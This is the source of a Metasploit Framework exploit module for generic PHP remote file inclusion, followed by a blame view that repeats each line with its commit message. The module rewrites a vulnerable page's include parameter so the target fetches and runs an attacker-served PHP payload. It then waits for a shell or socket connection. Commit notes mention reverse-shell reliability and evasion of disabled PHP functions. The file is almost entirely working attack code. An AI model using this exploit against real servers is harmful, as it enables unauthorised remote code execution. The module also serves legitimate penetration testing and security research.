metasploit-framework/modules/exploits/unix/webapp/php_include.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'PHP Include Generic Exploit',
			'Description'    => %q{
				Exploits things like <?php include($_GET['path']); ?>
			},
			'Author'         => [ 'hdm' , 'egypt' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      => 
						{
							'ConnectionType' => 'find',
						},
					'Space'       => 32768,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/test.php?path=!URL!"]),
				], self.class)
	end
	

	def php_exploit
		# very short timeout because the request may never return if we're
		# sending a socket payload
		timeout = 0.01
		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))
		print_status("Trying uri #{uri}")
		response = send_request_raw({ 'uri' => uri },timeout)

		handler
	end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
More reliable reverse shell git-svn-id: file:///home/svn/framework3/trunk@5429 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-04 07:34:26 +00:00			`# $Id$`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log git-svn-id: file:///home/svn/framework3/trunk@6479 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-13 14:33:26 +00:00			`# http://metasploit.com/framework/`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`


Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`require 'msf/core'`


This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::HttpServer::PHPInclude`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'PHP Include Generic Exploit',`
			`'Description' => %q{`
More reliable reverse shell git-svn-id: file:///home/svn/framework3/trunk@5429 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-04 07:34:26 +00:00			`Exploits things like <?php include($_GET['path']); ?>`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`},`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`'Author' => [ 'hdm' , 'egypt' ],`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`'License' => MSF_LICENSE,`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`'Version' => '$Revision$',`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`'References' =>`
			`[`

			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`'Compat' =>`
			`{`
			`'ConnectionType' => 'find',`
			`},`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`'Space' => 32768,`
			`},`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DefaultTarget' => 0))`
Slight cleanups -- still not ready for real use git-svn-id: file:///home/svn/framework3/trunk@4216 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:02:35 +00:00
			`register_options(`
			`[`
			`OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/test.php?path=!URL!"]),`
			`], self.class)`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`end`

More reliable reverse shell git-svn-id: file:///home/svn/framework3/trunk@5429 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-04 07:34:26 +00:00
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`def php_exploit`
More reliable reverse shell git-svn-id: file:///home/svn/framework3/trunk@5429 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-04 07:34:26 +00:00			`# very short timeout because the request may never return if we're`
			`# sending a socket payload`
			`timeout = 0.01`
			`uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))`
			`print_status("Trying uri #{uri}")`
remove debug statements, add disabled_functions evasion in php findsock stuff git-svn-id: file:///home/svn/framework3/trunk@5700 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-30 19:56:16 +00:00			`response = send_request_raw({ 'uri' => uri },timeout)`
More reliable reverse shell git-svn-id: file:///home/svn/framework3/trunk@5429 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-04 07:34:26 +00:00
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`handler`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`end`
More reliable reverse shell git-svn-id: file:///home/svn/framework3/trunk@5429 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-04 07:34:26 +00:00
Code cleanups git-svn-id: file:///home/svn/framework3/trunk@5773 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-19 21:03:39 +00:00			`end`